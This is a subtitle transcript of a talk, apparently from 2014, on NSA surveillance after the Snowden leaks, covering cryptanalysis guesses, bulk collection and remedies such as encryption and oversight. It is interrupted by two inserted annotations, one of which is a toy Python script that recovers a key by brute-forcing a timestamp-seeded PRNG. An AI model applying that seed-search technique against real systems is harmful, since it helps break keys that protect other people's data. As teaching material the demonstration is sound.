And we've also lost trust in the institutions. 333 00:23:04,000 --> 00:23:08,000 The internet governance model is kind of broken right now, 334 00:23:08,000 --> 00:23:11,000 because really, until now, 335 00:23:11,000 --> 00:23:14,000 it's been largely a benign US dictatorship, 336 00:23:14,000 --> 00:23:17,000 under the general belief that the US is acting 337 00:23:17,000 --> 00:23:19,000 in vaguely the world's best interests, 338 00:23:19,000 --> 00:23:21,000 and we can just let it be that way. 339 00:23:21,000 --> 00:23:24,000 And that turns out not to be true. 340 00:23:24,000 --> 00:23:27,000 And we have nothing to replace it. 341 00:23:27,000 --> 00:23:30,000 So we're just sort of flopping around right now. 342 00:23:30,000 --> 00:23:33,000 I mean, there are a lot of details we don't know, 343 00:23:33,000 --> 00:23:35,000 and I think we'll never know. 344 00:23:35,000 --> 00:23:39,000 There's nothing about cryptography in the documents. 345 00:23:39,000 --> 00:23:41,000 I looked. 346 00:23:42,000 --> 00:23:45,000 These are really all on the SIGINT side. 347 00:23:45,000 --> 00:23:48,000 There are not a lot of company names. 348 00:23:48,000 --> 00:23:52,000 That PRISM slide was a ginormous exception. 349 00:23:52,000 --> 00:23:56,000 Generally, all company names are hidden behind code names, 350 00:23:56,000 --> 00:23:58,000 and the code names are never defined.
351 00:23:58,000 --> 00:24:02,000 There's something called ECI, exceptionally controlled information. 352 00:24:02,000 --> 00:24:05,000 Basically, it's not written down. 353 00:24:05,000 --> 00:24:10,000 So we will forever only know companies by code names. 354 00:24:11,000 --> 00:24:14,000 Now we have some of the telcos. 355 00:24:14,000 --> 00:24:16,000 REMEDY is BT. 356 00:24:16,000 --> 00:24:17,000 There's another one. 357 00:24:17,000 --> 00:24:21,000 We know some of those, but a lot we're just never going to know. 358 00:24:21,000 --> 00:24:24,000 And there'll be a lot of programs we don't know. 359 00:24:24,000 --> 00:24:28,000 I mean, the documents really are just shadows of what's going on. 360 00:24:28,000 --> 00:24:31,000 So there's still going to be a lot, a lot hidden. 361 00:24:31,000 --> 00:24:33,000 But we have to deal with this. 362 00:24:33,000 --> 00:24:36,000 I mean, this is what we have to work with. 363 00:24:36,000 --> 00:24:39,000 We have to work with all of this ignorance as to what exactly 364 00:24:39,000 --> 00:24:41,000 has been subverted, 365 00:24:41,000 --> 00:24:44,000 what exactly has been turned. 366 00:24:44,000 --> 00:24:46,000 And we have a choice to make, 367 00:24:46,000 --> 00:24:50,000 as people who design the internet, who use the internet. 368 00:24:50,000 --> 00:24:54,000 And it's not a choice of: does the NSA spy or not. 369 00:24:54,000 --> 00:24:59,000 It's a choice between an internet that is vulnerable to all attackers 370 00:24:59,000 --> 00:25:02,000 or an internet that is secure for all users. 371 00:25:02,000 --> 00:25:04,000 That's our actual choice. 372 00:25:04,000 --> 00:25:08,000 The problem is we have made surveillance too cheap. 373 00:25:08,000 --> 00:25:12,000 And the solution is to make it expensive again. 374 00:25:12,000 --> 00:25:15,000 There's good news and bad news about encryption. 375 00:25:15,000 --> 00:25:18,000 Edward Snowden, in his first interview after his name 376 00:25:18,000 --> 00:25:20,000 became public, talked about this. 377 00:25:20,000 --> 00:25:23,000 And he said: encryption works. 378 00:25:23,000 --> 00:25:28,000 Properly implemented strong crypto systems are one of the few things you can rely on. 379 00:25:28,000 --> 00:25:29,000 We know this is true. 380 00:25:29,000 --> 00:25:31,000 This is the lesson of Tor. 381 00:25:31,000 --> 00:25:34,000 The NSA can't break Tor, and it pisses them off. 382 00:25:34,000 --> 00:25:44,000 Take the NSA program to collect buddy lists from the browser-to-web-server connection. 383 00:25:44,000 --> 00:25:47,000 There were numbers for the data collected. 384 00:25:47,000 --> 00:25:51,000 They collected about 10 times the data from Yahoo as from Google, 385 00:25:51,000 --> 00:25:55,000 which makes no sense, because Google might have 10 times the users Yahoo does. 386 00:25:55,000 --> 00:26:00,000 Once you realize that Google is using SSL by default 387 00:26:00,000 --> 00:26:03,000 and Yahoo isn't, that does make sense. 388 00:26:03,000 --> 00:26:06,000 The unencrypted connections are more fruitful. 389 00:26:06,000 --> 00:26:08,000 This is also a lesson of MUSCULAR. 390 00:26:08,000 --> 00:26:11,000 There's a great handwritten back-of-the-napkin slide 391 00:26:11,000 --> 00:26:18,000 where the engineers are describing how they get the data from Google's backbone. 392 00:26:18,000 --> 00:26:22,000 They point to the place where SSL is removed. 393 00:26:22,000 --> 00:26:25,000 Right? Encryption works. 394 00:26:25,000 --> 00:26:28,000 And in some ways that's surprising.
395 00:26:28,000 --> 00:26:30,000 But it's true. 396 00:26:30,000 --> 00:26:35,000 Unfortunately, you know, Snowden said this in the sentence right after the one I just read. 397 00:26:35,000 --> 00:26:39,000 He said: unfortunately, endpoint security is so terrifically weak 398 00:26:39,000 --> 00:26:42,000 that the NSA can frequently find ways around it. 399 00:26:42,000 --> 00:26:47,000 This isn't news to us either. 400 00:26:47,000 --> 00:26:48,000 Right? 401 00:26:48,000 --> 00:26:50,000 The way to break crypto is to get around it. 402 00:26:50,000 --> 00:26:54,000 We do know there is some piece of cryptanalysis the NSA has. 403 00:26:54,000 --> 00:26:57,000 It's some secret thing. 404 00:26:57,000 --> 00:27:00,000 There's the basic anecdotal evidence. 405 00:27:00,000 --> 00:27:01,000 Right? 406 00:27:01,000 --> 00:27:03,000 The NSA makes this huge investment in mathematics 407 00:27:03,000 --> 00:27:06,000 that's unparalleled anywhere else in the world. 408 00:27:06,000 --> 00:27:09,000 They hire about the top 10% of math PhDs every year 409 00:27:09,000 --> 00:27:12,000 out of US universities. 410 00:27:12,000 --> 00:27:15,000 And more interestingly, there's a sentence. 411 00:27:15,000 --> 00:27:18,000 The black budget, the intelligence budget, was leaked. 412 00:27:18,000 --> 00:27:20,000 It was a Snowden document, 413 00:27:20,000 --> 00:27:21,000 I think in August. 414 00:27:21,000 --> 00:27:29,000 It was a few pages of the budget and an entire introduction by James Clapper, the director of 415 00:27:29,000 --> 00:27:30,000 National Intelligence. 416 00:27:30,000 --> 00:27:33,000 And this is a sentence in that document, in his introduction. 417 00:27:33,000 --> 00:27:38,000 It's kind of out of context, but it's really worth listening to the exact words. 418 00:27:38,000 --> 00:27:43,000 He says: we are investing in groundbreaking cryptanalytic capabilities to defeat 419 00:27:43,000 --> 00:27:48,000 adversarial cryptography and exploit internet traffic. 420 00:27:48,000 --> 00:27:54,000 Now, that doesn't sound like: we've hired a bunch of really smart mathematicians and 421 00:27:54,000 --> 00:27:58,000 put them in a room and given them a lot of computers, hoping to get lucky. 422 00:27:58,000 --> 00:28:03,000 That sounds a lot more like: we have a piece of, we have something 423 00:28:03,000 --> 00:28:10,000 that's at the edge of usability, and we're building the massive computer, or doing the 424 00:28:10,000 --> 00:28:13,000 massive pre-computation, or designing the massive hardware. 425 00:28:13,000 --> 00:28:17,000 We're doing the engineering to make it work. 426 00:28:17,000 --> 00:28:20,000 That's how I read that. 427 00:28:20,000 --> 00:28:24,000 That they have something, but there's an engineering issue. 428 00:28:24,000 --> 00:28:27,000 I had three guesses of what it is. 429 00:28:27,000 --> 00:28:32,000 I was given a fourth a couple of days ago, and so I'll give them all, 430 00:28:32,000 --> 00:28:34,000 in no real order. 431 00:28:34,000 --> 00:28:37,000 The first one is elliptic curves. 432 00:28:37,000 --> 00:28:39,000 There's a lot of math in elliptic curves. 433 00:28:39,000 --> 00:28:43,000 It's easy to imagine that there is a lot of math we don't know about elliptic curves. 434 00:28:43,000 --> 00:28:48,000 Maybe some general advance, or some advance in certain classes of elliptic curves. 435 00:28:48,000 --> 00:28:52,000 If you can force curves into that class, you can have a leg up on breaking them.
436 00:28:52,000 --> 00:28:57,000 We do know that the NSA has affected curve selection. 437 00:28:57,000 --> 00:29:01,000 That's a decent guess. 438 00:29:01,000 --> 00:29:05,000 The second guess is some kind of general factoring technique. 439 00:29:05,000 --> 00:29:08,000 Think about factoring in the academic world. 440 00:29:08,000 --> 00:29:09,000 It gets better every year. 441 00:29:09,000 --> 00:29:12,000 A bit here, a bit there. 442 00:29:12,000 --> 00:29:16,000 Factoring has improved over the years, over the decades. 443 00:29:16,000 --> 00:29:19,000 Give the NSA a five-to-ten-year advantage, 444 00:29:19,000 --> 00:29:21,000 however you want to characterize it, 445 00:29:21,000 --> 00:29:26,000 and you can think of where they are. 446 00:29:26,000 --> 00:29:30,000 The third guess is RC4. 447 00:29:30,000 --> 00:29:34,000 RC4 is commonly used on the internet. 448 00:29:34,000 --> 00:29:35,000 Still secure, as far as we know. 449 00:29:35,000 --> 00:29:45,000 You can imagine that, five years ahead of the academic state of the art, 450 00:29:45,000 --> 00:29:49,000 someone could figure out an attack. 451 00:29:49,000 --> 00:29:55,000 Last week, I talked with John Kelsey, who suggested random number generators. 452 00:29:55,000 --> 00:30:00,000 A lot of random number generators have really lousy entropy. 453 00:30:00,000 --> 00:30:05,000 That is a candidate for a massive pre-computation attack. 454 00:30:05,000 --> 00:30:14,000 If you know exactly in what way certain RNGs are bad, you can use that to extraordinarily 455 00:30:14,000 --> 00:30:16,000 pare down your brute-force search. 456 00:30:16,000 --> 00:30:18,000 That's an interesting example.
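To make that fourth guess concrete, here is a toy illustration of why weak entropy invites precomputation: if keys are derived from a generator seeded with something small and guessable — a Unix timestamp, in this invented example — the attacker searches seeds, not keys. The seed source and key derivation here are assumptions for illustration only.

```python
# Toy demonstration: a "128-bit" key derived from a badly seeded PRNG is
# really only as strong as the seed space. Searching a window of timestamps
# replaces a 2^128 brute force with a few thousand guesses.
import random

def weak_key(seed):
    """Stand-in for a key derived from a badly seeded generator."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(16))

victim_key = weak_key(1_390_000_000)      # victim keyed off the current time

# Attacker: walk the plausible seed window instead of the key space.
for seed in range(1_389_999_000, 1_390_001_000):
    if weak_key(seed) == victim_key:
        print("recovered seed:", seed)
        break
```

Knowing *exactly* how a deployed RNG is weak lets you precompute the whole reachable key set once and reuse it against every victim.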
457 00:30:18,000 --> 00:30:27,000 Even with all of this, we know that most current cryptography frustrates the NSA, at least at scale. 458 00:30:27,000 --> 00:30:28,000 Right? 459 00:30:28,000 --> 00:30:31,000 Individually, no, but at scale, yes. 460 00:30:31,000 --> 00:30:37,000 We know that mostly the NSA breaks crypto by getting around it. 461 00:30:37,000 --> 00:30:42,000 When Clapper says that crypto doesn't give them much trouble, that's what he's talking about. 462 00:30:42,000 --> 00:30:44,000 He's talking about getting around it. 463 00:30:44,000 --> 00:30:49,000 Bad implementations, default and weak keys, sabotaging standards, 464 00:30:49,000 --> 00:30:56,000 deliberately subverting products and services, and what the NSA calls exfiltrating keys. 465 00:30:56,000 --> 00:31:00,000 That's code for stealing. 466 00:31:00,000 --> 00:31:02,000 Going in and stealing keys. 467 00:31:02,000 --> 00:31:06,000 It's effective. 468 00:31:06,000 --> 00:31:09,000 And mostly the NSA relies on unencrypted streams of data. 469 00:31:09,000 --> 00:31:10,000 Right? 470 00:31:10,000 --> 00:31:12,000 A lot of this stuff is not encrypted. 471 00:31:12,000 --> 00:31:17,000 Internet data, cloud data, cell phone data, other third-party data. 472 00:31:17,000 --> 00:31:18,000 Right? 473 00:31:18,000 --> 00:31:21,000 It's out there in the clear. 474 00:31:21,000 --> 00:31:25,000 As Target just learned, I guess. 475 00:31:25,000 --> 00:31:26,000 Right? 476 00:31:26,000 --> 00:31:27,000 So here's the problem. 477 00:31:27,000 --> 00:31:28,000 Right? 478 00:31:28,000 --> 00:31:33,000 We've made bulk data collection too easy. 479 00:31:33,000 --> 00:31:34,000 Right? 480 00:31:34,000 --> 00:31:38,000 It's easier for the NSA to collect everything than to target. 481 00:31:38,000 --> 00:31:41,000 Now, solutions are going to be complicated. 482 00:31:41,000 --> 00:31:42,000 Right? 483 00:31:42,000 --> 00:31:43,000 It's a complicated problem. 484 00:31:43,000 --> 00:31:45,000 There's no easy solution. 485 00:31:45,000 --> 00:31:50,000 It includes government self-correction, technical measures, legal measures, international 486 00:31:50,000 --> 00:31:54,000 cooperation, and I think a major shift in how we think about security and privacy. 487 00:31:54,000 --> 00:31:59,000 I want to run through some of the ways I think this will get fixed. 488 00:31:59,000 --> 00:32:02,000 The first one is the self-corrections. 489 00:32:02,000 --> 00:32:05,000 Now, inside the NSA, things have changed. 490 00:32:05,000 --> 00:32:06,000 They have to have. 491 00:32:06,000 --> 00:32:07,000 Right? 492 00:32:07,000 --> 00:32:10,000 Amazing as it is to all of us, 493 00:32:10,000 --> 00:32:13,000 the NSA had no contingency plans for all of this 494 00:32:13,000 --> 00:32:15,000 being leaked. 495 00:32:15,000 --> 00:32:16,000 Right? 496 00:32:16,000 --> 00:32:21,000 If you remember the NSA's responses in the first month, they had no clue what to say. 497 00:32:21,000 --> 00:32:25,000 It took them like seven, eight, nine weeks to get a PR firm with the proper security clearance, 498 00:32:25,000 --> 00:32:27,000 so they could get a good message. 499 00:32:27,000 --> 00:32:28,000 I mean, now they're good. 500 00:32:28,000 --> 00:32:30,000 They do press releases. 501 00:32:30,000 --> 00:32:31,000 They have a blog. 502 00:32:31,000 --> 00:32:33,000 They're really good about being on message. 503 00:32:33,000 --> 00:32:35,000 But it took them a long time to get there. 504 00:32:35,000 --> 00:32:36,000 Right? 505 00:32:36,000 --> 00:32:37,000 That's over. 506 00:32:37,000 --> 00:32:38,000 Right? 507 00:32:38,000 --> 00:32:40,000 The cost-benefit analysis has changed. 508 00:32:40,000 --> 00:32:46,000 The NSA is going to have to incorporate the risk of exposure in anything they do. 509 00:32:46,000 --> 00:32:47,000 Right? 510 00:32:47,000 --> 00:32:53,000 The political blowback has been kind of enormous here, from our allies. 511 00:32:53,000 --> 00:32:55,000 And that's new. 512 00:32:55,000 --> 00:33:00,000 I mean, if the Snowden documents said the NSA was spying on North Korea and the Taliban, 513 00:33:00,000 --> 00:33:01,000 nobody would care. 514 00:33:01,000 --> 00:33:02,000 Right? 515 00:33:02,000 --> 00:33:04,000 The NSA spied on Belgium. 516 00:33:04,000 --> 00:33:09,000 Or worse, GCHQ spied on Belgium, which is like Nebraska spying on Connecticut. 517 00:33:09,000 --> 00:33:10,000 Right? 518 00:33:10,000 --> 00:33:19,000 But you have to assume that the nature of secrecy is changing. 519 00:33:19,000 --> 00:33:22,000 It used to be, in intelligence, 520 00:33:22,000 --> 00:33:24,000 you'd come in out of college, 521 00:33:24,000 --> 00:33:25,000 you'd go into the club, 522 00:33:25,000 --> 00:33:27,000 you'd have a job for life. 523 00:33:27,000 --> 00:33:28,000 Right? 524 00:33:28,000 --> 00:33:31,000 You'd be part of the inner circle. 525 00:33:31,000 --> 00:33:34,000 And that's the way secrecy worked. 526 00:33:35,000 --> 00:33:42,000 Tell anybody under 30 "job for life" and they laugh at you. 527 00:33:42,000 --> 00:33:45,000 I mean, Chelsea Manning was on a four-year tour. 528 00:33:45,000 --> 00:33:47,000 Edward Snowden was a contractor.
529 00:33:47,000 --> 00:33:52,000 They knew they had no job security. 530 00:33:52,000 --> 00:33:53,000 Right? 531 00:33:53,000 --> 00:33:54,000 So it's different. 532 00:33:54,000 --> 00:33:58,000 And I have to believe that the NSA now has to look at their programs and say: this is going to be 533 00:33:58,000 --> 00:34:01,000 public in three to five years. 534 00:34:01,000 --> 00:34:02,000 Is it okay? 535 00:34:03,000 --> 00:34:06,000 And that changes their risk analysis. 536 00:34:06,000 --> 00:34:12,000 As for the self-corrections inside government: President Obama talked a bit about that yesterday, 537 00:34:12,000 --> 00:34:17,000 that maybe we shouldn't do things just because we can do things. 538 00:34:17,000 --> 00:34:23,000 And the collect-everything mantra, which was, you know, General Alexander's — General Hayden's before 539 00:34:23,000 --> 00:34:24,000 him — 540 00:34:24,000 --> 00:34:27,000 you know, maybe that isn't the right thing to do. 541 00:34:27,000 --> 00:34:28,000 Right? 542 00:34:28,000 --> 00:34:30,000 There are limitations to intelligence. 543 00:34:30,000 --> 00:34:35,000 There are all these studies showing this is not effective. 544 00:34:35,000 --> 00:34:40,000 And I think this is going to change, you know, how we view intelligence. 545 00:34:40,000 --> 00:34:45,000 That the voyeurism just isn't worth it, because the cost is too great. 546 00:34:45,000 --> 00:34:47,000 There will be corrections inside corporations. 547 00:34:47,000 --> 00:34:53,000 Before Snowden, it cost you nothing to cooperate with the NSA. 548 00:34:53,000 --> 00:34:58,000 And if you were a company — and the telcos did this since the '40s, throughout the Cold War — 549 00:34:58,000 --> 00:35:01,000 cooperating with the NSA is what you did. 550 00:35:01,000 --> 00:35:03,000 The internet companies were a little more taken aback, 551 00:35:03,000 --> 00:35:05,000 a little more fighting back. 552 00:35:05,000 --> 00:35:08,000 But still, everyone believed this would never become public, 553 00:35:08,000 --> 00:35:10,000 and you could do it with impunity. 554 00:35:10,000 --> 00:35:13,000 And now corporations know that's just not true. 555 00:35:13,000 --> 00:35:18,000 There's enormous reputational loss when it comes out that you cooperated, 556 00:35:18,000 --> 00:35:25,000 and enormous reputational value in fighting. We see Apple and Microsoft and Yahoo and Google — 557 00:35:26,000 --> 00:35:32,000 Twitter, Facebook, to some extent LinkedIn — they're all fighting publicly. 558 00:35:34,000 --> 00:35:38,000 The hardware companies less, the telcos almost not at all. 559 00:35:38,000 --> 00:35:41,000 But even that's changing. 560 00:35:41,000 --> 00:35:45,000 There's a push against AT&T: tell the world what you're doing, fight back. 561 00:35:45,000 --> 00:35:52,000 And that's just going to change the calculus, because you can't rely on this cooperation anymore. 562 00:35:53,000 --> 00:35:56,000 So that's the self-corrections. 563 00:35:56,000 --> 00:36:00,000 There are a lot of things technically that we have to do. 564 00:36:00,000 --> 00:36:05,000 And a lot of this relies on this notion of bulk collection. 565 00:36:05,000 --> 00:36:11,000 The NSA might have a larger budget than everyone else combined, but they are not made of magic. 566 00:36:11,000 --> 00:36:17,000 They're constrained by the laws of economics, the laws of physics, and the laws of math. 567 00:36:18,000 --> 00:36:23,000 And the goal has to be to make bulk collection even more expensive.
568 00:36:23,000 --> 00:36:28,000 I don't think we'll ever eliminate targeted collection. 569 00:36:28,000 --> 00:36:33,000 That NSA toolkit that we just saw at the end of last month was from 2008. 570 00:36:33,000 --> 00:36:36,000 It's a lot better now. TAO is very, very good. 571 00:36:36,000 --> 00:36:41,000 If the NSA wants into somebody's computer, they will get in. Period. 572 00:36:41,000 --> 00:36:44,000 But that's targeted. 573 00:36:45,000 --> 00:36:47,000 That's, I think, okay. 574 00:36:47,000 --> 00:36:51,000 It's the bulk stuff that we want to deal with. 575 00:36:51,000 --> 00:36:59,000 And there are a lot of things we can do here that involve redesigning protocols, redesigning defaults. 576 00:36:59,000 --> 00:37:07,000 I mean, some of this was talked about yesterday, but the more we can encrypt the backbone, the better we'll do. 577 00:37:07,000 --> 00:37:12,000 I mean, encrypting the backbone makes QUANTUM go away. 578 00:37:12,000 --> 00:37:15,000 Right? It provides real security against bulk attacks. 579 00:37:15,000 --> 00:37:20,000 More importantly, it provides cover traffic for those who really need it to stay alive. 580 00:37:20,000 --> 00:37:30,000 Right: more encryption in the cloud, more perfect forward secrecy — more things that raise the cost of doing it in bulk.
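As one concrete, hedged example of what "more perfect forward secrecy" means in practice: a Python TLS server context restricted to ephemeral (ECDHE) key exchange, so that bulk-recorded traffic can't be decrypted later by stealing the server's long-term key. The certificate file names are placeholders.

```python
# Sketch: a TLS server context that only offers forward-secret key exchange.
import ssl

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile="server.crt", keyfile="server.key")  # hypothetical paths
ctx.set_ciphers("ECDHE+AESGCM")   # ephemeral key exchange only, no static RSA
```

With static-RSA key exchange, one stolen server key retroactively opens every recorded session; with ECDHE, each session gets its own throwaway key, so bulk recording buys much less.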
581 00:37:30,000 --> 00:37:35,000 And anything we can do to redesign products and services. 582 00:37:35,000 --> 00:37:39,000 And we know user-level application encryption is hard. 583 00:37:40,000 --> 00:37:45,000 The more-than-20-year lesson of PGP is that one-click email encryption is one click too much. 584 00:37:45,000 --> 00:37:51,000 Right, on the other hand, OTR is a really good lesson in how to do this successfully. 585 00:37:51,000 --> 00:37:53,000 Or hard drive encryption. 586 00:37:53,000 --> 00:37:57,000 I think that's maybe our biggest success story in encryption. 587 00:37:57,000 --> 00:38:00,000 It is so easy and so transparent and so invisible 588 00:38:00,000 --> 00:38:04,000 that there is no reason for everybody not to encrypt their hard drives. 589 00:38:04,000 --> 00:38:07,000 You never even notice you're doing it. 590 00:38:07,000 --> 00:38:09,000 It comes default in the operating systems. 591 00:38:09,000 --> 00:38:14,000 If you don't trust those, there are various third-party packages. 592 00:38:14,000 --> 00:38:16,000 More endpoint security. 593 00:38:16,000 --> 00:38:20,000 NSA documents talk about PSPs, personal security products, 594 00:38:20,000 --> 00:38:22,000 and they give them trouble. 595 00:38:22,000 --> 00:38:24,000 They don't like them. 596 00:38:24,000 --> 00:38:28,000 Right, so the more we use them, the better off we are. 597 00:38:28,000 --> 00:38:31,000 Right, more open standards, more open source. 598 00:38:31,000 --> 00:38:34,000 Right, things that are harder to subvert. 599 00:38:35,000 --> 00:38:38,000 Another big thing I think we need to go back to is target dispersal. 600 00:38:38,000 --> 00:38:44,000 We were way more secure when there were 100,000 ISPs than when there were 100. 601 00:38:44,000 --> 00:38:50,000 Having these massive targets is very dangerous. 602 00:38:50,000 --> 00:38:53,000 I mean, not just technically but legally. 603 00:38:53,000 --> 00:38:56,000 Right, a single Google, a single Facebook. 604 00:38:56,000 --> 00:38:58,000 Everybody on Gmail. 605 00:38:58,000 --> 00:39:03,000 You actually don't want this. 606 00:39:03,000 --> 00:39:05,000 And the last thing is assurance. 607 00:39:05,000 --> 00:39:08,000 This is the hardest, but this is the most important. 608 00:39:08,000 --> 00:39:11,000 We really need to figure assurance out. 609 00:39:11,000 --> 00:39:16,000 We need to be able to prove, to demonstrate somehow, that the software we use 610 00:39:16,000 --> 00:39:20,000 does what we want it to do and doesn't do anything else. 611 00:39:20,000 --> 00:39:25,000 That's nowhere near term, 612 00:39:25,000 --> 00:39:29,000 given the way we are assembling modern software. 613 00:39:29,000 --> 00:39:32,000 But it's extraordinarily important, 614 00:39:33,000 --> 00:39:43,000 right, because a lot of this surveillance relies on these hidden capabilities. 615 00:39:43,000 --> 00:39:48,000 But largely, despite all this, this is a political problem. 616 00:39:48,000 --> 00:39:50,000 And it's a difficult political problem. 617 00:39:50,000 --> 00:39:56,000 In the US, we are long past the point where simple legal interventions can help. 618 00:39:57,000 --> 00:40:01,000 I'll tell you about one particular database: 619 00:40:01,000 --> 00:40:04,000 the cell phone call record database, 620 00:40:04,000 --> 00:40:09,000 collected under one particular legal authority, 702. 621 00:40:09,000 --> 00:40:15,000 I think the odds are zero that that is the only way the NSA gets that data. 622 00:40:15,000 --> 00:40:19,000 And if they don't get it, the Brits get it and give it to us. 623 00:40:19,000 --> 00:40:23,000 I largely think that 702 is a crumple zone, 624 00:40:23,000 --> 00:40:26,000 and the real capabilities are behind that. 625 00:40:26,000 --> 00:40:29,000 And we know in general what the solution looks like: 626 00:40:29,000 --> 00:40:33,000 transparency, oversight, accountability. 627 00:40:33,000 --> 00:40:36,000 But how exactly that works is going to be really hard. 628 00:40:36,000 --> 00:40:41,000 And our problem is that law lags technology. 629 00:40:41,000 --> 00:40:46,000 The technology is always ahead of the legal regime that restricts it. 630 00:40:46,000 --> 00:40:52,000 So the NSA is going to go into these new technologies with everything, because there's nothing stopping them. 631 00:40:53,000 --> 00:40:57,000 There's a quote from General Hayden, the previous NSA director — 632 00:40:57,000 --> 00:40:59,000 I think it's from a TV interview — 633 00:40:59,000 --> 00:41:02,000 and he's talking about his limitations. 634 00:41:02,000 --> 00:41:05,000 And he says: give me the box you will allow me to operate in. 635 00:41:05,000 --> 00:41:08,000 I'm going to play to the very edges of that box. 636 00:41:08,000 --> 00:41:14,000 That makes sense, until you realize that technology expands his box constantly. 637 00:41:14,000 --> 00:41:19,000 So if he's pushing the edges, by the time law gets around to noticing, the box is bigger, 638 00:41:19,000 --> 00:41:20,000 and it's too late 639 00:41:20,000 --> 00:41:25,000 to reduce the capabilities. 640 00:41:25,000 --> 00:41:30,000 And of course, even if we do succeed, reining in the NSA only affects the United States. 641 00:41:30,000 --> 00:41:35,000 It's not going to really affect non-US persons, despite what Obama said yesterday. 642 00:41:35,000 --> 00:41:39,000 It's not going to affect the actions of other countries. 643 00:41:39,000 --> 00:41:46,000 And when I talk about this in other environments, I very often get this sort of response: 644 00:41:46,000 --> 00:41:52,000 you can't stop the NSA, because if you do, then China will do it.
645 00:41:52,000 --> 00:41:55,000 And that's fundamentally an arms race argument. 646 00:41:55,000 --> 00:41:59,000 It's a zero-sum game: us versus China, whoever your enemy is. 647 00:41:59,000 --> 00:42:02,000 And if we don't do it, they will, and they win. 648 00:42:02,000 --> 00:42:05,000 And that's a really bad position to be in. 649 00:42:05,000 --> 00:42:08,000 And I think it's the wrong way to frame this. 650 00:42:08,000 --> 00:42:14,000 What we have to do is get the world to realize that a secure internet is in everyone's best interest. 651 00:42:14,000 --> 00:42:16,000 And it's not us versus them. 652 00:42:16,000 --> 00:42:18,000 It's security versus insecurity. 653 00:42:18,000 --> 00:42:23,000 Once you do that, you turn a zero-sum game into a positive-sum game. 654 00:42:23,000 --> 00:42:25,000 You have laws and treaties that support it. 655 00:42:25,000 --> 00:42:27,000 You have technology that supports the laws. 656 00:42:27,000 --> 00:42:29,000 You set up other laws, 657 00:42:29,000 --> 00:42:32,000 other technology, to deal with non-compliant actors, state and non-state. 658 00:42:32,000 --> 00:42:34,000 Now, that doesn't make it easy. 659 00:42:34,000 --> 00:42:38,000 But it makes it like any other one of the hard international problems: 660 00:42:38,000 --> 00:42:43,000 money laundering, nuclear non-proliferation, human trafficking, small-arms trafficking, 661 00:42:43,000 --> 00:42:45,000 landmines. 662 00:42:45,000 --> 00:42:52,000 I mean, it's very hard to make those work internationally, for all the reasons you know. 663 00:42:52,000 --> 00:42:57,000 But at least we all know vaguely the direction we're moving towards. 664 00:42:57,000 --> 00:43:01,000 We all sort of know the goal. 665 00:43:01,000 --> 00:43:06,000 And the goal is security versus surveillance. 666 00:43:06,000 --> 00:43:10,000 And if you think about that, that's the NSA's dual mission. 667 00:43:11,000 --> 00:43:13,000 It's securing our stuff, 668 00:43:13,000 --> 00:43:15,000 eavesdropping on their stuff. 669 00:43:15,000 --> 00:43:20,000 Worked great when our stuff was NATO and their stuff was the Warsaw Pact. 670 00:43:20,000 --> 00:43:24,000 Works less well when our stuff and their stuff are the same. 671 00:43:24,000 --> 00:43:30,000 Works really badly when the administration tells you to eavesdrop on everybody, 672 00:43:30,000 --> 00:43:33,000 because the terrorists could be everywhere, striking at any time, 673 00:43:33,000 --> 00:43:36,000 or because we're constantly scared. 674 00:43:37,000 --> 00:43:41,000 So the two missions go out of balance. 675 00:43:41,000 --> 00:43:44,000 And what we need to do is balance them, 676 00:43:44,000 --> 00:43:53,000 and even more so, rebalance them, weighting security more than surveillance. 677 00:43:53,000 --> 00:44:00,000 Right? I mean, the surveillance here is robust — again: politically, legally, technically. 678 00:44:00,000 --> 00:44:05,000 And we need to solve this not just for the NSA, but for everybody: 679 00:44:05,000 --> 00:44:10,000 for the other governments, cyber criminals, rogue actors. 680 00:44:10,000 --> 00:44:15,000 I think a secure internet is vital to society. 681 00:44:15,000 --> 00:44:18,000 And I think we need to move forward to get there. 682 00:44:18,000 --> 00:44:24,000 In the near term, I actually don't think for a minute we'll win the "stop doing this" argument. 683 00:44:24,000 --> 00:44:27,000 We might win the "tell us what you're doing" argument. 684 00:44:27,000 --> 00:44:31,000 And I think that would be worth it.
685 00:44:31,000 --> 00:44:34,000 For us, we need to fight futility. 686 00:44:34,000 --> 00:44:38,000 A lot of times when I talk to political activists, especially from third-world countries, 687 00:44:38,000 --> 00:44:40,000 there's a lot of futility out there. 688 00:44:40,000 --> 00:44:41,000 "There's nothing I can do, 689 00:44:41,000 --> 00:44:43,000 therefore I should do nothing." 690 00:44:43,000 --> 00:44:44,000 That's wrong. 691 00:44:44,000 --> 00:44:45,000 That's bad. 692 00:44:45,000 --> 00:44:48,000 Right? Everything we do makes it harder. 693 00:44:48,000 --> 00:44:50,000 Makes it better. 694 00:44:50,000 --> 00:44:53,000 And fighting that sense of futility is really important. 695 00:44:53,000 --> 00:44:54,000 I mean, we need to do that. 696 00:44:54,000 --> 00:44:57,000 We need to fight the balkanization of the internet. 697 00:44:58,000 --> 00:45:00,000 I think that's the worst blowback from the NSA surveillance: 698 00:45:00,000 --> 00:45:04,000 the idea that some countries will make their own internet somehow, 699 00:45:04,000 --> 00:45:06,000 even if that's possible. 700 00:45:06,000 --> 00:45:10,000 There's enormous value in a single global internet. 701 00:45:10,000 --> 00:45:13,000 And we need to figure out who we can trust. 702 00:45:13,000 --> 00:45:16,000 We need to figure out the new governance models. 703 00:45:16,000 --> 00:45:18,000 What organizations, right? 704 00:45:18,000 --> 00:45:20,000 Not the ITU, please. 705 00:45:20,000 --> 00:45:22,000 But something. 706 00:45:22,000 --> 00:45:26,000 And I think we eventually will win the protect-the-world- 707 00:45:26,000 --> 00:45:28,000 instead-of-eavesdropping-on-it argument. 708 00:45:28,000 --> 00:45:31,000 I mean, it might not be for another 10 years. 709 00:45:31,000 --> 00:45:34,000 But I do believe that is where we are headed. 710 00:45:34,000 --> 00:45:37,000 And then when someone says, well, if you don't do it, China will, 711 00:45:37,000 --> 00:45:40,000 you can say, well, just because China builds a Maginot Line 712 00:45:40,000 --> 00:45:42,000 doesn't mean we have to. 713 00:45:42,000 --> 00:45:44,000 That would be dumb. 714 00:45:44,000 --> 00:45:48,000 Because, fundamentally, that's what's true. 715 00:45:48,000 --> 00:45:51,000 And really, I'm going to end with this. 716 00:45:51,000 --> 00:45:54,000 This problem is much bigger than the NSA. 717 00:45:55,000 --> 00:45:58,000 In general, this is about data. 718 00:45:58,000 --> 00:45:59,000 It's about data sharing. 719 00:45:59,000 --> 00:46:03,000 